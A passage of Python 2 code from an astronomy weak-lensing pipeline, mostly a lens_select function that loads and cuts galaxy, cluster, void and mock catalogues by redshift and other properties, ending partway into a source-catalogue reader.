print 'status: ', decrypted_data.status
#print 'stderr: ', decrypted_data.stderr
#print 'Decrypted string (additive m value for the catalog): ', decrypted_data.data
return decrypted_data.data
def lens_select(lensargs):
"""
lens_select(dictionary lensargs)
Selects lens sample
:Parameters:
- lensargs : Dictionary read from the config file which contains various
cuts on the lens sample
:Returns:
- ra : Right ascension in degrees
- dec : Declination in degrees
- zred : Redshift
- weight : Weights for the lenses
:Adding new samples:
        Add new samples by copy-pasting one of the lensargs blocks below and modifying it as needed.
"""
if lensargs["type"] == "generic":
hdulist = pyfits.open(lensargs["fname"])
data = hdulist[1].data
ra = data["ra"].astype("float64")
dec = data["dec"].astype("float64")
z = data["z"].astype("float64")
wt = data["wt"].astype("float64")
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, z, wt
# Use generic text file with the columns:
# ra (deg), dec (deg), z, lens_wt
# Any lines beginning with "#" are ignored
if lensargs["type"] == "generic-text":
data = pandas.read_csv(lensargs["fname"], delim_whitespace=1, header=None, names=(["ra", "dec", "z", "wt"]), comment="#")
ra = data["ra"].values.astype("float64")
dec = data["dec"].values.astype("float64")
z = data["z"].values.astype("float64")
wt = data["wt"].values.astype("float64")
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, z, wt
if lensargs["type"] == "gama":
hdulist = pyfits.open(".//home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/gama/G3CFOFGroup.fits")
data = hdulist[1].data
ra = data["IterCenRA"].astype("float64") #ra of galaxies in the lense
dec = data["IterCenDec"].astype("float64") #dec of galaxies in the lense
z = data["IterCenZ"].astype("float64") #redshift of galaxies in the lense
vdisp=data["VelDisp"].astype("float64")
idx = (z>lensargs["zmin"]) & (z<=lensargs["zmax"]) & (vdisp>lensargs["vdispmin"]) & (vdisp<=lensargs["vdispmax"])
ra = ra[idx]
dec = dec[idx]
z = z[idx]
vdisp = vdisp[idx]
wt = ra/ra
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, z, wt
if lensargs["type"] == "mgii-absorbers-ran":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/INFO_140303_Ref_Mg_II_DR79_match.fits")
data = hdulist[1].data
ra = data["ra"].astype("float64")
dec = data["dec"].astype("float64")
zabs = data["zabs"].astype("float64")
idx = (zabs>lensargs["zmin"]) & (zabs<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zabs = zabs[idx]
wt = ra/ra
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, zabs, wt
if lensargs["type"] == "mgii-absorbers":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/INFO_140303_Mg_II_DR79_match.fits")
data = hdulist[1].data
ra = data["ra"].astype("float64")
dec = data["dec"].astype("float64")
zabs = data["zabs"].astype("float64")
idx = (zabs>lensargs["zmin"]) & (zabs<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zabs = zabs[idx]
wt = ra/ra
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, zabs, wt
if lensargs['type'] == "hsc-cmass-subsample-random":
df = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_CMASS/CMASS_K+E_v0.99.dat", delim_whitespace=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
wt = (df.weight_noz.values + df.weight_cp.values - 1.0)* df.weight_star.values
iMag = df.Mag_Wake.values
idx = (iMag>lensargs["iMagmin"]) & (iMag<=lensargs["iMagmax"]) & (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
# First compute the selection function as a function of redshift
idxall = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
zarr = np.linspace(lensargs["zmin"], lensargs["zmax"], 20)
selarr = np.zeros(zarr.size-1)
for i in range(1, zarr.size):
selarr[i-1] = np.sum(idx & (zred>zarr[i-1]) & (zred<=zarr[i]))*1.0/np.sum(idxall & (zred>zarr[i-1]) & (zred<=zarr[i]))
print i, selarr[i-1], "\n================="
zarr = zarr[:-1]/2. + zarr[1:]/2.
from scipy.interpolate import UnivariateSpline
selspl = UnivariateSpline(zarr, selarr, bbox=(lensargs["zmin"], lensargs["zmax"]), ext=1)
with SqliteDict("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_CMASS/randoms/ran%03d.sqlite3" % (lensargs["rannum"])) as data:
ra = data["ra"]
dec = data["dec"]
zred = data["z"].astype('float64')
wt = data["weight"].astype("float64")
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
np.random.seed(lensargs["rannum"])
rannum = np.random.random(size=ra.size)
idx = (rannum<selspl(zred))
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d samples \n" % (ra.size))
#jackreg = getregions(ra, dec, lensargs["jackregfile"])
return ra, dec, zred, wt #, jackreg
if lensargs['type'] == "hsc-lowz-subsample":
df = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_LOWZ/LOWZ_K+E_v0.99.dat", delim_whitespace=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
wt = (df.weight_noz.values + df.weight_cp.values - 1.0)* df.weight_star.values
iMag = df.Mag_Wake.values
idx = (iMag>lensargs["iMagmin"]) & (iMag<=lensargs["iMagmax"]) & (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
if lensargs['selection_write'] == 1:
idxall = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
zarr = np.linspace(lensargs["zmin"], lensargs["zmax"], 20)
selarr = np.zeros(zarr.size-1)
for i in range(1, zarr.size):
selarr[i-1] = np.sum(idx & (zred>zarr[i-1]) & (zred<=zarr[i]))*1.0/np.sum(idxall & (zred>zarr[i-1]) & (zred<=zarr[i]))
print i, selarr[i-1], "\n================="
zarr = zarr[:-1]/2. + zarr[1:]/2.
dfsel = pandas.DataFrame(zarr, columns=(["zred"]))
dfsel["sel"] = selarr
dfsel.to_csv(lensargs["selection"], index=False, sep=" ")
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
iMag = iMag[idx]
sys.stdout.write("Selecting %d samples \n" % (ra.size))
#jackreg = getregions(ra, dec, lensargs["jackregfile"])
return ra, dec, zred, wt #, jackreg
if lensargs['type'] == "hsc-cmass-subsample":
df = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_CMASS/CMASS_K+E_v0.99.dat", delim_whitespace=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
wt = (df.weight_noz.values + df.weight_cp.values - 1.0)* df.weight_star.values
iMag = df.Mag_Wake.values
idx = (iMag>lensargs["iMagmin"]) & (iMag<=lensargs["iMagmax"]) & (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
if lensargs['selection_write'] == 1:
idxall = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
zarr = np.linspace(lensargs["zmin"], lensargs["zmax"], 20)
selarr = np.zeros(zarr.size-1)
for i in range(1, zarr.size):
selarr[i-1] = np.sum(idx & (zred>zarr[i-1]) & (zred<=zarr[i]))*1.0/np.sum(idxall & (zred>zarr[i-1]) & (zred<=zarr[i]))
print i, selarr[i-1], "\n================="
zarr = zarr[:-1]/2. + zarr[1:]/2.
dfsel = pandas.DataFrame(zarr, columns=(["zred"]))
dfsel["sel"] = selarr
dfsel.to_csv(lensargs["selection"], index=False, sep=" ")
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
iMag = iMag[idx]
sys.stdout.write("Selecting %d samples \n" % (ra.size))
#jackreg = getregions(ra, dec, lensargs["jackregfile"])
return ra, dec, zred, wt #, jackreg
if lensargs['type'] == "SDSS-QSOs-John":
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/SDSS_QSOs_zlt1.asc"
dfreal = pandas.read_csv(fname, delim_whitespace=1, names=(["ra", "dec", "z"]), usecols=([1, 2, 7]))
ra = dfreal["ra"].values
dec = dfreal["dec"].values
zred = dfreal["z"].values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock-forreq-random-full":
rannum = lensargs['rannum']
rotation = lensargs['rotation']
realization = lensargs['realization']
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD_full/random_*")
np.random.seed(rannum)
for i, fname in enumerate(files):
tractreg = fname.split("_")[-1]
realfile = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD_full/r%03d_rotmat%d_%s" % (realization, rotation, tractreg)
dfreal = pandas.read_csv(realfile, delim_whitespace=1, skiprows=1, names=(["ra", "dec", "z"]), usecols=([1, 2, 3]))
Nreal = dfreal.ra.values.size
rowstart = rannum * Nreal
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1+rowstart, names=(["ra", "dec", "z"]), usecols=([0, 1, 2]), nrows=Nreal)
else:
dfp = pandas.read_csv(fname, delim_whitespace=1, skiprows=1+rowstart, names=(["ra", "dec", "z"]), usecols=([0, 1, 2]), nrows=Nreal)
df = df.append(dfp, ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock-forreq-random":
rannum = lensargs['rannum']
rotation = lensargs['rotation']
realization = lensargs['realization']
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD/random_*")
np.random.seed(rannum)
for i, fname in enumerate(files):
tractreg = fname.split("_")[-1]
realfile = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD/r%03d_rotmat%d_%s" % (realization, rotation, tractreg)
dfreal = pandas.read_csv(realfile, delim_whitespace=1, skiprows=1, names=(["ra", "dec", "z"]), usecols=([1, 2, 3]))
Nreal = dfreal.ra.values.size
rowstart = rannum * Nreal
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1+rowstart, names=(["ra", "dec", "z"]), usecols=([0, 1, 2]), nrows=Nreal)
else:
dfp = pandas.read_csv(fname, delim_whitespace=1, skiprows=1+rowstart, names=(["ra", "dec", "z"]), usecols=([0, 1, 2]), nrows=Nreal)
df = df.append(dfp, ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock-forreq-full":
realization = lensargs['realization']
rotation = lensargs['rotation']
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD_full/r%03d_rotmat%d_*" % (realization, rotation))
for i, fname in enumerate(files):
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3]))
else:
df = df.append(pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3])), ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock-forreq":
realization = lensargs['realization']
rotation = lensargs['rotation']
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD/r%03d_rotmat%d_*" % (realization, rotation))
for i, fname in enumerate(files):
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3]))
else:
df = df.append(pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3])), ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock":
realization = lensargs['realization']
rotation = lensargs['rotation']
sample = lensargs['sample']
zmin = lensargs["zmin"]
zmax = lensargs["zmax"]
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/hod_gal/%s_%.2f_%.2f/newID/r%03d_rotmat%d_*" % (sample, zmin, zmax, realization, rotation))
for i, fname in enumerate(files):
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3]))
else:
df = df.append(pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3])), ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "dr12-lowz":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/DR12/galaxy_DR12v5_LOWZ_North.fits.gz")
data = hdulist[1].data
ra_n = data["ra"]
dec_n = data["dec"]
zred_n = data["z"].astype('float64')
wt_n = data["weight_systot"].astype("float64")
idx = (zred_n>lensargs["zmin"]) & (zred_n<=lensargs["zmax"])
ra_n = ra_n[idx]
dec_n = dec_n[idx]
zred_n = zred_n[idx]
wt_n = wt_n[idx]
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/DR12/galaxy_DR12v5_LOWZ_South.fits.gz")
data = hdulist[1].data
ra_s = data["ra"]
dec_s = data["dec"]
zred_s = data["z"].astype('float64')
wt_s = data["weight_systot"].astype("float64")
idx = (zred_s>lensargs["zmin"]) & (zred_s<=lensargs["zmax"])
ra_s = ra_s[idx]
dec_s = dec_s[idx]
zred_s = zred_s[idx]
wt_s = wt_s[idx]
ra = np.append(ra_n, ra_s)
dec = np.append(dec_n, dec_s)
zred = np.append(zred_n, zred_s)
wt = np.append(wt_n, wt_s)
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
if "pofzoutput" in lensargs:
n, bins = np.histogram(zred, weights=wt, bins=np.linspace(np.min(zred), np.max(zred), 20), normed=1)
np.savetxt(lensargs["pofzoutput"], np.transpose([bins[1:]/2+bins[:-1]/2, n]))
exit(11)
return ra, dec, zred, wt
if lensargs['type'] == "cfht-cmass-reproduce":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_CMASS/cmass-dr11v1-A-Anderson.dat_wcollind_mstel_xdist.fits")
data = hdulist[1].data
ra = data["ra"]
dec = data["dec"]
zred = data["z"].astype('float64')
wt_star = data["weight_star"].astype("float64")
wt_noz = data["weight_noz"].astype("float64")
wt_cp = data["weight_cp"].astype("float64")
wt = wt_star*(wt_noz+wt_cp-1)
mstar = data["logmass"]
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (mstar>lensargs["mstarmin"]) & (mstar<=lensargs["mstarmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "dr12-cmass":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/DR12/galaxy_DR12v5_CMASS_North.fits.gz")
data = hdulist[1].data
ra_n = data["ra"]
dec_n = data["dec"]
zred_n = data["z"].astype('float64')
wt_n = data["weight_systot"].astype("float64")
idx = (zred_n>lensargs["zmin"]) & (zred_n<=lensargs["zmax"])
ra_n = ra_n[idx]
dec_n = dec_n[idx]
zred_n = zred_n[idx]
wt_n = wt_n[idx]
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/DR12/galaxy_DR12v5_CMASS_South.fits.gz")
data = hdulist[1].data
ra_s = data["ra"]
dec_s = data["dec"]
zred_s = data["z"].astype('float64')
wt_s = data["weight_systot"].astype("float64")
idx = (zred_s>lensargs["zmin"]) & (zred_s<=lensargs["zmax"])
ra_s = ra_s[idx]
dec_s = dec_s[idx]
zred_s = zred_s[idx]
wt_s = wt_s[idx]
ra = np.append(ra_n, ra_s)
dec = np.append(dec_n, dec_s)
zred = np.append(zred_n, zred_s)
wt = np.append(wt_n, wt_s)
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
if "pofzoutput" in lensargs:
n, bins = np.histogram(zred, weights=wt, bins=np.linspace(np.min(zred), np.max(zred), 20), normed=1)
np.savetxt(lensargs["pofzoutput"], np.transpose([bins[1:]/2+bins[:-1]/2, n]))
exit(11)
return ra, dec, zred, wt
if lensargs['type'] == "voids":
df = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Voids/Void_combined_catalog.dat", delim_whitespace=1)
ra = df.ra.values
dec = df.dec.values
zred = df.zred.values
wt = ra/ra
sys.stdout.write("Selecting %d voids \n" % (ra.size))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "alexie-test":
ra, dec, zred, wt = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/alexie-test/bossdr12_GAMA15_zbin1.txt", unpack=1)
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper-smallR":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper-smallR/dr8_run_redmapper_v5.10-0.75_lgt5_prunedcatalog.fit")
data = hdulist[1].data
ra = data["ra"]
dec = data["dec"]
zred = data["z_lambda"].astype('float64')
lamda = data["lambda_chisq"]
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lamda>lensargs["lammin"]) & (lamda<=lensargs["lammax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper-largeR":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper-largeR/dr8_run_redmapper_v5.10-1.25_lgt5_prunedcatalog.fit")
data = hdulist[1].data
ra = data["ra"]
dec = data["dec"]
zred = data["z_lambda"].astype('float64')
lamda = data["lambda_chisq"]
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lamda>lensargs["lammin"]) & (lamda<=lensargs["lammax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v5.10_catalog.fits")
data = hdulist[1].data
ra = data["ra"]
dec = data["dec"]
zred = data["z_lambda"].astype('float64')
lamda = data["lambda"]
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lamda>lensargs["lammin"]) & (lamda<=lensargs["lammax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "arindam_lenses":
fp=pandas.read_csv("arindam/arindam_lenses.csv",delimiter=",",usecols=[0,1,2],header=None,skiprows=1)
ra = fp[0].astype('float64')
dec = fp[1].astype('float64')
zred = fp[2].astype('float64')
wt = ra/ra
idx=fp[2] > 0
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
return ra, dec, zred, wt
if lensargs['type'] == "redmapper_satellite":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_members.fits")
hdulist2 = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_catalog.fits")
data = hdulist[1].data
data2 = hdulist2[1].data
        #choose clusters where the cluster centre is defined with probability more than 95%
tp_cen=data2["P_CEN"].astype("float64")
aa=np.array([i[0] for i in tp_cen])
tidx2=aa>0.95
data2=data2[tidx2]
cid_idx=data2["id"] #in cluster catalog
mid_idx=data["id"] #member catalog
tidx = np.where(np.in1d(mid_idx, cid_idx),True,False)
data=data[tidx]
zlamda=data2["z_lambda"]
cid=data2["id"]
ldict={}
for ii in range(cid.size):
ldict[cid[ii]]=zlamda[ii]
mid=data['id']
ra = data["ra"]
dec = data["dec"]
lamda = data2["lambda"]
wt = ra/ra
r = data["r"]
zred = ra*0.0
for jj in range(mid.size):
zred[jj]=ldict[mid[jj]].astype('float64')
rr=r*(1.+zred) #to convert from physical to comoving distances
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (rr>lensargs["rmin"]) & (rr<=lensargs["rmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
#lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper_satellite_stellar_counterpart":
#hdulist = pyfits.open("pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_members.fits")
hdulist=pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_hsc_sdss_stellar_counterpart.fits")
#hdulist2 = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_catalog.fits")
data = hdulist[1].data
#data2 = hdulist2[1].data
#zlamda=data2["z_lambda"]
#cid=data2["id"]
#ldict={}
#for ii in range(cid.size):
# ldict[cid[ii]]=zlamda[ii]
#mid=data['id']
ra = data["sdssdata_ra"].astype("float64")
dec = data["sdssdata_dec"].astype("float64")
#lamda = data2["lambda"].astype("float64")
wt = ra/ra
r = data["redmapper_rsat"]
zred = data["redmapper_zstellar"].astype("float64")
#for jj in range(mid.size):
# zred[jj]=ldict[mid[jj]].astype('float64')
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (r>lensargs["rmin"]) & (r<=lensargs["rmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
#lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper_random":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_randoms.fits")
data = hdulist[1].data
ra = data["ra"].astype('float64')
dec = data["dec"].astype('float64')
zred = data["z"].astype('float64')
lamda = data["lambda"].astype('float64')
wt = data["weight"].astype('float64')
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper-random":
ra, dec, zred, lamda, wt = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_public_v5.10_randoms_%05d.dat" % (lensargs["rannum"]), unpack=1)
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lamda>lensargs["lammin"]) & (lamda<=lensargs["lammax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d randoms \n" % (np.sum(idx)))
        return ra, dec, zred, wt  # arrays were already filtered with idx above
if lensargs['type'] == "redmapper_satellite_in_hsc_field":
hdulist = pyfits.open("hsc_redmapper_overlap/redmapper_members_hsc_overlap_.fits")
data = hdulist[1].data
ra = data['redmapper_Ra'].astype('float64')
dec = data['redmapper_Dec'].astype('float64')
wt = ra/ra
r = data['dist_from_cluster_center'].astype('float64')
zred = data['redmapper_redshift'].astype('float64')
rr=r*(1.+zred) #to convert from physical to comoving distances
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (rr>lensargs["rmin"]) & (rr<=lensargs["rmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
#lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "sdss-vagc-lbg":
ra, dec, zred, mstel, mag = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/LBG/Isolated_v0.dat", unpack=1)
mstel = np.log10(mstel)
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (mstel>lensargs["xmstelmin"]) & (mstel<=lensargs["xmstelmax"])
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
return ra[idx], dec[idx], zred[idx], wt[idx]
if lensargs['type'] == "lowz_rcsrestrict":
ra, dec, zred, lam, wt = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/rcsrestrict_dr12_v5_lowz_All_catalog.dat", unpack=1)
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
return ra[idx], dec[idx], zred[idx], wt[idx]
if lensargs['type'] == "camira":
ra, dec, zred, lam = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/camira/%s/%s/camira_catalog.dat" % (lensargs['hsc-release'], lensargs['version']), unpack=1, usecols=(0, 1, 2, 3))
wt = lam/lam
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lam>lensargs["lammin"]) & (lam<=lensargs["lammax"])
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
if "pofzoutput" in lensargs:
n, bins = np.histogram(zred, weights=wt, bins=np.linspace(np.min(zred), np.max(zred), 20), normed=1)
np.savetxt(lensargs["pofzoutput"], np.transpose([bins[1:]/2+bins[:-1]/2, n]))
exit(11)
return ra, dec, zred, wt
def source_select(sourceargs, chunksize):
"""
source_select(dictionary lensargs)
Selects source sample
:Parameters:
- sourceargs : Dictionary read from the config file which contains various
cuts on the source sample
- chunksize : The chunksize of sources to be read (only applicable for some ascii readers)
    :Returns: datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
- datagal : array consisting of ra, dec, e1, e2, weight, erms, m, c1, c2, a1, a2
- sourceargs : Dictionary read from the config file which contains various
cuts on the source sample
- Ngal : Number of galaxies
- status : status of the read
- pofz : Record arrays read from the P(z) file for `Ngal` galaxies
- datagalflag: Flag array to indicate whether to use the galaxy or not
- pofzflag: Flag array to indicate whether to use the photoz of the galaxy or not
"""
if sourceargs['type'] == "hsc-wide-s16a_v2.0" and sourceargs['filetype'] == "fits" and not sourceargs["fullpofz"]:
# This variable iterates over the different fields in the catalog
itern = sourceargs['iter']
if itern == 0:
if not sourceargs["blinded"]:
sourceargs["df"] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/Mapping_from_Rachel_catalogs_to_Hironao_catalogs.dat.calibrated", delim_whitespace=1)
else:
sourceargs["df"] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/Mapping_from_Rachel_catalogs_to_Hironao_catalogs.dat", delim_whitespace=1)
if "usefield" in sourceargs:
restidx = sourceargs["df"].field.values==sourceargs["usefield"]
sourceargs["df"] = sourceargs["df"][restidx]
print "Using only field", sourceargs["usefield"]
datagal = 0
Ngal = 0
pofz = 0
status = not (itern<(sourceargs['df'].field.values.size))
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
field = sourceargs["df"].field.values[itern]
tract = sourceargs["df"].tract.values[itern]
